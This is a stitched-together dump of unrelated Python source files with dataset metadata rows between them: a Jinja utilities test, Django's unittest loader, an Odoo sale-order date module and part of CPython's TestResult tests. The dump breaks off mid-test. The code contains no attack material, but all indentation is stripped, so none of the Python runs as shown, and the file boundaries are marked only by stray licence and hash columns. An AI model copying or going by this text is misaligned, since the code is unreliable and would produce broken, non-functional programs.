# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=relative-import
from core.tests import test_utils
import jinja_utils
class JinjaUtilsUnitTests(test_utils.GenericTestBase):
def test_js_string_filter(self):
"""Test js_string filter."""
expected_values = [
('a', '\\"a\\"'),
(2, '2'),
(5.5, '5.5'),
("'", '\\"\\\'\\"'),
(u'¡Hola!', '\\"\\\\u00a1Hola!\\"'),
(['a', '¡Hola!', 2], '[\\"a\\", \\"\\\\u00a1Hola!\\", 2]'),
({'a': 4, '¡Hola!': 2}, '{\\"a\\": 4, \\"\\\\u00a1Hola!\\": 2}'),
('', '\\"\\"'),
(None, 'null'),
(['a', {'b': 'c', 'd': ['e', None]}],
'[\\"a\\", {\\"b\\": \\"c\\", \\"d\\": [\\"e\\", null]}]')
]
for tup in expected_values:
self.assertEqual(jinja_utils.JINJA_FILTERS['js_string'](
tup[0]), tup[1])
def test_parse_string(self):
parsed_str = jinja_utils.parse_string('{{test}}', {'test': 'hi'})
self.assertEqual(parsed_str, 'hi')
# Some parameters are missing.
parsed_str = jinja_utils.parse_string(
'{{test}} and {{test2}}', {'test2': 'hi'})
self.assertEqual(parsed_str, ' and hi')
# All parameters are missing.
parsed_str = jinja_utils.parse_string('{{test}} and {{test2}}', {})
self.assertEqual(parsed_str, ' and ')
# The string has no parameters.
parsed_str = jinja_utils.parse_string('no params', {'param': 'hi'})
self.assertEqual(parsed_str, 'no params')
# Integer parameters are used.
parsed_str = jinja_utils.parse_string('int {{i}}', {'i': 2})
self.assertEqual(parsed_str, 'int 2')
def test_evaluate_object(self):
parsed_object = jinja_utils.evaluate_object('abc', {})
self.assertEqual(parsed_object, 'abc')
parsed_object = jinja_utils.evaluate_object('{{ab}}', {'ab': 'c'})
self.assertEqual(parsed_object, 'c')
parsed_object = jinja_utils.evaluate_object('abc{{ab}}', {'ab': 'c'})
self.assertEqual(parsed_object, 'abcc')
parsed_object = jinja_utils.evaluate_object(
['a', '{{a}}', 'a{{a}}'], {'a': 'b'})
self.assertEqual(parsed_object, ['a', 'b', 'ab'])
parsed_object = jinja_utils.evaluate_object({}, {})
self.assertEqual(parsed_object, {})
parsed_object = jinja_utils.evaluate_object({}, {'a': 'b'})
self.assertEqual(parsed_object, {})
parsed_object = jinja_utils.evaluate_object({'a': 'b'}, {})
self.assertEqual(parsed_object, {'a': 'b'})
parsed_object = jinja_utils.evaluate_object(
{'a': 'a{{b}}'}, {'b': 'c'})
self.assertEqual(parsed_object, {'a': 'ac'})
parsed_object = jinja_utils.evaluate_object({'a': '{{b}}'}, {'b': 3})
self.assertEqual(parsed_object, {'a': '3'})
parsed_object = jinja_utils.evaluate_object({'a': '{{b}}'}, {'b': 'c'})
self.assertEqual(parsed_object, {'a': 'c'})
# Failure cases should be handled gracefully.
parsed_object = jinja_utils.evaluate_object('{{c}}', {})
self.assertEqual(parsed_object, '')
parsed_object = jinja_utils.evaluate_object('{{c}}', {'a': 'b'})
self.assertEqual(parsed_object, '')
# Test that the original dictionary is unchanged.
orig_dict = {'a': '{{b}}'}
parsed_dict = jinja_utils.evaluate_object(orig_dict, {'b': 'c'})
self.assertEqual(orig_dict, {'a': '{{b}}'})
self.assertEqual(parsed_dict, {'a': 'c'})
| apache-2.0 | 2,457,329,882,570,763,000 | 1,260,798,460,556,075,800 | 37.1 | 79 | 0.549988 | false |
cosmiclattes/TPBviz | torrent/lib/python2.7/site-packages/django/utils/unittest/loader.py | 110 | 13445 | """Loading unittests."""
import os
import re
import sys
import traceback
import types
import unittest
from fnmatch import fnmatch
from django.utils.unittest import case, suite
try:
from os.path import relpath
except ImportError:
from django.utils.unittest.compatibility import relpath
__unittest = True
def _CmpToKey(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) == -1
return K
# what about .pyc or .pyo (etc)
# we would need to avoid loading the same tests multiple times
# from '.py', '.pyc' *and* '.pyo'
VALID_MODULE_NAME = re.compile(r'[_a-z]\w*\.py$', re.IGNORECASE)
def _make_failed_import_test(name, suiteClass):
message = 'Failed to import test module: %s' % name
if hasattr(traceback, 'format_exc'):
# Python 2.3 compatibility
# format_exc returns two frames of discover.py as well
message += '\n%s' % traceback.format_exc()
return _make_failed_test('ModuleImportFailure', name, ImportError(message),
suiteClass)
def _make_failed_load_tests(name, exception, suiteClass):
return _make_failed_test('LoadTestsFailure', name, exception, suiteClass)
def _make_failed_test(classname, methodname, exception, suiteClass):
def testFailure(self):
raise exception
attrs = {methodname: testFailure}
TestClass = type(classname, (case.TestCase,), attrs)
return suiteClass((TestClass(methodname),))
class TestLoader(unittest.TestLoader):
"""
This class is responsible for loading tests according to various criteria
and returning them wrapped in a TestSuite
"""
testMethodPrefix = 'test'
sortTestMethodsUsing = cmp
suiteClass = suite.TestSuite
_top_level_dir = None
def loadTestsFromTestCase(self, testCaseClass):
"""Return a suite of all tests cases contained in testCaseClass"""
if issubclass(testCaseClass, suite.TestSuite):
raise TypeError("Test cases should not be derived from TestSuite."
" Maybe you meant to derive from TestCase?")
testCaseNames = self.getTestCaseNames(testCaseClass)
if not testCaseNames and hasattr(testCaseClass, 'runTest'):
testCaseNames = ['runTest']
loaded_suite = self.suiteClass(map(testCaseClass, testCaseNames))
return loaded_suite
def loadTestsFromModule(self, module, use_load_tests=True):
"""Return a suite of all tests cases contained in the given module"""
tests = []
for name in dir(module):
obj = getattr(module, name)
if isinstance(obj, type) and issubclass(obj, unittest.TestCase):
tests.append(self.loadTestsFromTestCase(obj))
load_tests = getattr(module, 'load_tests', None)
tests = self.suiteClass(tests)
if use_load_tests and load_tests is not None:
try:
return load_tests(self, tests, None)
except Exception as e:
return _make_failed_load_tests(module.__name__, e,
self.suiteClass)
return tests
def loadTestsFromName(self, name, module=None):
"""Return a suite of all tests cases given a string specifier.
The name may resolve either to a module, a test case class, a
test method within a test case class, or a callable object which
returns a TestCase or TestSuite instance.
The method optionally resolves the names relative to a given module.
"""
parts = name.split('.')
if module is None:
parts_copy = parts[:]
while parts_copy:
try:
module = __import__('.'.join(parts_copy))
break
except ImportError:
del parts_copy[-1]
if not parts_copy:
raise
parts = parts[1:]
obj = module
for part in parts:
parent, obj = obj, getattr(obj, part)
if isinstance(obj, types.ModuleType):
return self.loadTestsFromModule(obj)
elif isinstance(obj, type) and issubclass(obj, unittest.TestCase):
return self.loadTestsFromTestCase(obj)
elif (isinstance(obj, types.UnboundMethodType) and
isinstance(parent, type) and
issubclass(parent, unittest.TestCase)):
return self.suiteClass([parent(obj.__name__)])
elif isinstance(obj, unittest.TestSuite):
return obj
elif hasattr(obj, '__call__'):
test = obj()
if isinstance(test, unittest.TestSuite):
return test
elif isinstance(test, unittest.TestCase):
return self.suiteClass([test])
else:
raise TypeError("calling %s returned %s, not a test" %
(obj, test))
else:
raise TypeError("don't know how to make test from: %s" % obj)
def loadTestsFromNames(self, names, module=None):
"""Return a suite of all tests cases found using the given sequence
of string specifiers. See 'loadTestsFromName()'.
"""
suites = [self.loadTestsFromName(name, module) for name in names]
return self.suiteClass(suites)
def getTestCaseNames(self, testCaseClass):
"""Return a sorted sequence of method names found within testCaseClass
"""
def isTestMethod(attrname, testCaseClass=testCaseClass,
prefix=self.testMethodPrefix):
return attrname.startswith(prefix) and \
hasattr(getattr(testCaseClass, attrname), '__call__')
testFnNames = filter(isTestMethod, dir(testCaseClass))
if self.sortTestMethodsUsing:
testFnNames.sort(key=_CmpToKey(self.sortTestMethodsUsing))
return testFnNames
def discover(self, start_dir, pattern='test*.py', top_level_dir=None):
"""Find and return all test modules from the specified start
directory, recursing into subdirectories to find them. Only test files
that match the pattern will be loaded. (Using shell style pattern
matching.)
All test modules must be importable from the top level of the project.
If the start directory is not the top level directory then the top
level directory must be specified separately.
If a test package name (directory with '__init__.py') matches the
pattern then the package will be checked for a 'load_tests' function. If
this exists then it will be called with loader, tests, pattern.
If load_tests exists then discovery does *not* recurse into the package,
load_tests is responsible for loading all tests in the package.
The pattern is deliberately not stored as a loader attribute so that
packages can continue discovery themselves. top_level_dir is stored so
load_tests does not need to pass this argument in to loader.discover().
"""
set_implicit_top = False
if top_level_dir is None and self._top_level_dir is not None:
# make top_level_dir optional if called from load_tests in a package
top_level_dir = self._top_level_dir
elif top_level_dir is None:
set_implicit_top = True
top_level_dir = start_dir
top_level_dir = os.path.abspath(top_level_dir)
if not top_level_dir in sys.path:
# all test modules must be importable from the top level directory
# should we *unconditionally* put the start directory in first
# in sys.path to minimise likelihood of conflicts between installed
# modules and development versions?
sys.path.insert(0, top_level_dir)
self._top_level_dir = top_level_dir
is_not_importable = False
if os.path.isdir(os.path.abspath(start_dir)):
start_dir = os.path.abspath(start_dir)
if start_dir != top_level_dir:
is_not_importable = not os.path.isfile(os.path.join(start_dir, '__init__.py'))
else:
# support for discovery from dotted module names
try:
__import__(start_dir)
except ImportError:
is_not_importable = True
else:
the_module = sys.modules[start_dir]
top_part = start_dir.split('.')[0]
start_dir = os.path.abspath(os.path.dirname((the_module.__file__)))
if set_implicit_top:
self._top_level_dir = os.path.abspath(os.path.dirname(os.path.dirname(sys.modules[top_part].__file__)))
sys.path.remove(top_level_dir)
if is_not_importable:
raise ImportError('Start directory is not importable: %r' % start_dir)
tests = list(self._find_tests(start_dir, pattern))
return self.suiteClass(tests)
def _get_name_from_path(self, path):
path = os.path.splitext(os.path.normpath(path))[0]
_relpath = relpath(path, self._top_level_dir)
assert not os.path.isabs(_relpath), "Path must be within the project"
assert not _relpath.startswith('..'), "Path must be within the project"
name = _relpath.replace(os.path.sep, '.')
return name
def _get_module_from_name(self, name):
__import__(name)
return sys.modules[name]
def _match_path(self, path, full_path, pattern):
# override this method to use alternative matching strategy
return fnmatch(path, pattern)
def _find_tests(self, start_dir, pattern):
"""Used by discovery. Yields test suites it loads."""
paths = os.listdir(start_dir)
for path in paths:
full_path = os.path.join(start_dir, path)
if os.path.isfile(full_path):
if not VALID_MODULE_NAME.match(path):
# valid Python identifiers only
continue
if not self._match_path(path, full_path, pattern):
continue
# if the test file matches, load it
name = self._get_name_from_path(full_path)
try:
module = self._get_module_from_name(name)
except:
yield _make_failed_import_test(name, self.suiteClass)
else:
mod_file = os.path.abspath(getattr(module, '__file__', full_path))
realpath = os.path.splitext(mod_file)[0]
fullpath_noext = os.path.splitext(full_path)[0]
if realpath.lower() != fullpath_noext.lower():
module_dir = os.path.dirname(realpath)
mod_name = os.path.splitext(os.path.basename(full_path))[0]
expected_dir = os.path.dirname(full_path)
msg = ("%r module incorrectly imported from %r. Expected %r. "
"Is this module globally installed?")
raise ImportError(msg % (mod_name, module_dir, expected_dir))
yield self.loadTestsFromModule(module)
elif os.path.isdir(full_path):
if not os.path.isfile(os.path.join(full_path, '__init__.py')):
continue
load_tests = None
tests = None
if fnmatch(path, pattern):
# only check load_tests if the package directory itself matches the filter
name = self._get_name_from_path(full_path)
package = self._get_module_from_name(name)
load_tests = getattr(package, 'load_tests', None)
tests = self.loadTestsFromModule(package, use_load_tests=False)
if load_tests is None:
if tests is not None:
# tests loaded from package file
yield tests
# recurse into the package
for test in self._find_tests(full_path, pattern):
yield test
else:
try:
yield load_tests(self, tests, pattern)
except Exception as e:
yield _make_failed_load_tests(package.__name__, e,
self.suiteClass)
defaultTestLoader = TestLoader()
def _makeLoader(prefix, sortUsing, suiteClass=None):
loader = TestLoader()
loader.sortTestMethodsUsing = sortUsing
loader.testMethodPrefix = prefix
if suiteClass:
loader.suiteClass = suiteClass
return loader
def getTestCaseNames(testCaseClass, prefix, sortUsing=cmp):
return _makeLoader(prefix, sortUsing).getTestCaseNames(testCaseClass)
def makeSuite(testCaseClass, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromTestCase(testCaseClass)
def findTestCases(module, prefix='test', sortUsing=cmp,
suiteClass=suite.TestSuite):
return _makeLoader(prefix, sortUsing, suiteClass).loadTestsFromModule(module)
| gpl-3.0 | 8,355,986,575,746,063,000 | -1,977,566,966,300,549,000 | 40.754658 | 123 | 0.59524 | false |
srsman/odoo | addons/sale_order_dates/sale_order_dates.py | 223 | 5308 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime, timedelta
from openerp.osv import fields, osv
from openerp.tools.translate import _
from openerp.tools import DEFAULT_SERVER_DATETIME_FORMAT
class sale_order_dates(osv.osv):
"""Add several date fields to Sale Orders, computed or user-entered"""
_inherit = 'sale.order'
def _get_date_planned(self, cr, uid, order, line, start_date, context=None):
"""Compute the expected date from the requested date, not the order date"""
if order and order.requested_date:
date_planned = datetime.strptime(order.requested_date, DEFAULT_SERVER_DATETIME_FORMAT)
date_planned -= timedelta(days=order.company_id.security_lead)
return date_planned.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
return super(sale_order_dates, self)._get_date_planned(
cr, uid, order, line, start_date, context=context)
def _get_effective_date(self, cr, uid, ids, name, arg, context=None):
"""Read the shipping date from the related packings"""
# TODO: would be better if it returned the date the picking was processed?
res = {}
dates_list = []
for order in self.browse(cr, uid, ids, context=context):
dates_list = []
for pick in order.picking_ids:
dates_list.append(pick.date)
if dates_list:
res[order.id] = min(dates_list)
else:
res[order.id] = False
return res
def _get_commitment_date(self, cr, uid, ids, name, arg, context=None):
"""Compute the commitment date"""
res = {}
dates_list = []
for order in self.browse(cr, uid, ids, context=context):
dates_list = []
order_datetime = datetime.strptime(order.date_order, DEFAULT_SERVER_DATETIME_FORMAT)
for line in order.order_line:
if line.state == 'cancel':
continue
dt = order_datetime + timedelta(days=line.delay or 0.0)
dt_s = dt.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
dates_list.append(dt_s)
if dates_list:
res[order.id] = min(dates_list)
return res
def onchange_requested_date(self, cr, uid, ids, requested_date,
commitment_date, context=None):
"""Warn if the requested dates is sooner than the commitment date"""
if (requested_date and commitment_date and requested_date < commitment_date):
return {'warning': {
'title': _('Requested date is too soon!'),
'message': _("The date requested by the customer is "
"sooner than the commitment date. You may be "
"unable to honor the customer's request.")
}
}
return {}
_columns = {
'commitment_date': fields.function(_get_commitment_date, store=True,
type='datetime', string='Commitment Date',
help="Date by which the products are sure to be delivered. This is "
"a date that you can promise to the customer, based on the "
"Product Lead Times."),
'requested_date': fields.datetime('Requested Date',
readonly=True, states={'draft': [('readonly', False)],
'sent': [('readonly', False)]}, copy=False,
help="Date by which the customer has requested the items to be "
"delivered.\n"
"When this Order gets confirmed, the Delivery Order's "
"expected date will be computed based on this date and the "
"Company's Security Delay.\n"
"Leave this field empty if you want the Delivery Order to be "
"processed as soon as possible. In that case the expected "
"date will be computed using the default method: based on "
"the Product Lead Times and the Company's Security Delay."),
'effective_date': fields.function(_get_effective_date, type='date',
store=True, string='Effective Date',
help="Date on which the first Delivery Order was created."),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | 4,793,952,718,000,898,000 | 3,340,271,542,870,646,300 | 47.254545 | 98 | 0.587038 | false |
yousafsyed/casperjs | bin/Lib/unittest/test/test_result.py | 81 | 23247 | import io
import sys
import textwrap
from test import support
import traceback
import unittest
class Test_TestResult(unittest.TestCase):
# Note: there are not separate tests for TestResult.wasSuccessful(),
# TestResult.errors, TestResult.failures, TestResult.testsRun or
# TestResult.shouldStop because these only have meaning in terms of
# other TestResult methods.
#
# Accordingly, tests for the aforenamed attributes are incorporated
# in with the tests for the defining methods.
################################################################
def test_init(self):
result = unittest.TestResult()
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 0)
self.assertEqual(result.shouldStop, False)
self.assertIsNone(result._stdout_buffer)
self.assertIsNone(result._stderr_buffer)
# "This method can be called to signal that the set of tests being
# run should be aborted by setting the TestResult's shouldStop
# attribute to True."
def test_stop(self):
result = unittest.TestResult()
result.stop()
self.assertEqual(result.shouldStop, True)
# "Called when the test case test is about to be run. The default
# implementation simply increments the instance's testsRun counter."
def test_startTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# "Called after the test case test has been executed, regardless of
# the outcome. The default implementation does nothing."
def test_stopTest(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
result.stopTest(test)
# Same tests as above; make sure nothing has changed
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "Called before and after tests are run. The default implementation does nothing."
def test_startTestRun_stopTestRun(self):
result = unittest.TestResult()
result.startTestRun()
result.stopTestRun()
# "addSuccess(test)"
# ...
# "Called when the test case test succeeds"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addSuccess(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
result = unittest.TestResult()
result.startTest(test)
result.addSuccess(test)
result.stopTest(test)
self.assertTrue(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
# "addFailure(test, err)"
# ...
# "Called when the test case test signals a failure. err is a tuple of
# the form returned by sys.exc_info(): (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addFailure(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
test.fail("foo")
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addFailure(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 0)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
# "addError(test, err)"
# ...
# "Called when the test case test raises an unexpected exception err
# is a tuple of the form returned by sys.exc_info():
# (type, value, traceback)"
# ...
# "wasSuccessful() - Returns True if all tests run so far have passed,
# otherwise returns False"
# ...
# "testsRun - The total number of tests run so far."
# ...
# "errors - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test which raised an
# unexpected exception. Contains formatted
# tracebacks instead of sys.exc_info() results."
# ...
# "failures - A list containing 2-tuples of TestCase instances and
# formatted tracebacks. Each tuple represents a test where a failure was
# explicitly signalled using the TestCase.fail*() or TestCase.assert*()
# methods. Contains formatted tracebacks instead
# of sys.exc_info() results."
def test_addError(self):
class Foo(unittest.TestCase):
def test_1(self):
pass
test = Foo('test_1')
try:
raise TypeError()
except:
exc_info_tuple = sys.exc_info()
result = unittest.TestResult()
result.startTest(test)
result.addError(test, exc_info_tuple)
result.stopTest(test)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 0)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, test)
self.assertIsInstance(formatted_exc, str)
def test_addSubTest(self):
class Foo(unittest.TestCase):
def test_1(self):
nonlocal subtest
with self.subTest(foo=1):
subtest = self._subtest
try:
1/0
except ZeroDivisionError:
exc_info_tuple = sys.exc_info()
# Register an error by hand (to check the API)
result.addSubTest(test, subtest, exc_info_tuple)
# Now trigger a failure
self.fail("some recognizable failure")
subtest = None
test = Foo('test_1')
result = unittest.TestResult()
test.run(result)
self.assertFalse(result.wasSuccessful())
self.assertEqual(len(result.errors), 1)
self.assertEqual(len(result.failures), 1)
self.assertEqual(result.testsRun, 1)
self.assertEqual(result.shouldStop, False)
test_case, formatted_exc = result.errors[0]
self.assertIs(test_case, subtest)
self.assertIn("ZeroDivisionError", formatted_exc)
test_case, formatted_exc = result.failures[0]
self.assertIs(test_case, subtest)
self.assertIn("some recognizable failure", formatted_exc)
def testGetDescriptionWithoutDocstring(self):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
'testGetDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult)')
def testGetSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1, bar=2):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) (bar=2, foo=1)')
with self.subTest('some message'):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstring (' + __name__ +
'.Test_TestResult) [some message]')
def testGetSubTestDescriptionWithoutDocstringAndParams(self):
with self.subTest():
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetSubTestDescriptionWithoutDocstringAndParams '
'(' + __name__ + '.Test_TestResult) (<subtest>)')
def testGetNestedSubTestDescriptionWithoutDocstring(self):
with self.subTest(foo=1):
with self.subTest(bar=2):
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self._subtest),
'testGetNestedSubTestDescriptionWithoutDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithOneLineDocstring(self):
"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult) (bar=2, foo=1)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
def testStackFrameTrimming(self):
class Frame(object):
class tb_frame(object):
f_globals = {}
result = unittest.TestResult()
self.assertFalse(result._is_relevant_tb_level(Frame))
Frame.tb_frame.f_globals['__unittest'] = True
self.assertTrue(result._is_relevant_tb_level(Frame))
def testFailFast(self):
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addError(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addFailure(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addUnexpectedSuccess(None)
self.assertTrue(result.shouldStop)
def testFailFastSetByRunner(self):
runner = unittest.TextTestRunner(stream=io.StringIO(), failfast=True)
def test(result):
self.assertTrue(result.failfast)
result = runner.run(test)
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
'__init__'):
del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = False
self.buffer = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
def assertOldResultWarning(self, test, failures):
with support.check_warnings(("TestResult has no add.+ method,",
RuntimeWarning)):
result = OldResult()
test.run(result)
self.assertEqual(len(result.failures), failures)
def testOldTestResult(self):
class Test(unittest.TestCase):
def testSkip(self):
self.skipTest('foobar')
@unittest.expectedFailure
def testExpectedFail(self):
raise TypeError
@unittest.expectedFailure
def testUnexpectedSuccess(self):
pass
for test_name, should_pass in (('testSkip', True),
('testExpectedFail', True),
('testUnexpectedSuccess', False)):
test = Test(test_name)
self.assertOldResultWarning(test, int(not should_pass))
def testOldTestTesultSetup(self):
class Test(unittest.TestCase):
def setUp(self):
self.skipTest('no reason')
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldTestResultClass(self):
@unittest.skip('no reason')
class Test(unittest.TestCase):
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldResultWithRunner(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
runner = unittest.TextTestRunner(resultclass=OldResult,
stream=io.StringIO())
# This will raise an exception if TextTestRunner can't handle old
# test result objects
runner.run(Test('testFoo'))
class MockTraceback(object):
@staticmethod
def format_exception(*_):
return ['A traceback']
def restore_traceback():
unittest.result.traceback = traceback
class TestOutputBuffering(unittest.TestCase):
def setUp(self):
self._real_out = sys.stdout
self._real_err = sys.stderr
def tearDown(self):
sys.stdout = self._real_out
sys.stderr = self._real_err
def testBufferOutputOff(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
def testBufferOutputStartTestAddSuccess(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
result.buffer = True
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIsNot(real_out, sys.stdout)
self.assertIsNot(real_err, sys.stderr)
self.assertIsInstance(sys.stdout, io.StringIO)
self.assertIsInstance(sys.stderr, io.StringIO)
self.assertIsNot(sys.stdout, sys.stderr)
out_stream = sys.stdout
err_stream = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo')
print('bar', file=sys.stderr)
self.assertEqual(out_stream.getvalue(), 'foo\n')
self.assertEqual(err_stream.getvalue(), 'bar\n')
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
result.addSuccess(self)
result.stopTest(self)
self.assertIs(sys.stdout, result._original_stdout)
self.assertIs(sys.stderr, result._original_stderr)
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
self.assertEqual(out_stream.getvalue(), '')
self.assertEqual(err_stream.getvalue(), '')
def getStartedResult(self):
result = unittest.TestResult()
result.buffer = True
result.startTest(self)
return result
def testBufferOutputAddErrorOrFailure(self):
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
for message_attr, add_attr, include_error in [
('errors', 'addError', True),
('failures', 'addFailure', False),
('errors', 'addError', True),
('failures', 'addFailure', False)
]:
result = self.getStartedResult()
buffered_out = sys.stdout
buffered_err = sys.stderr
result._original_stdout = io.StringIO()
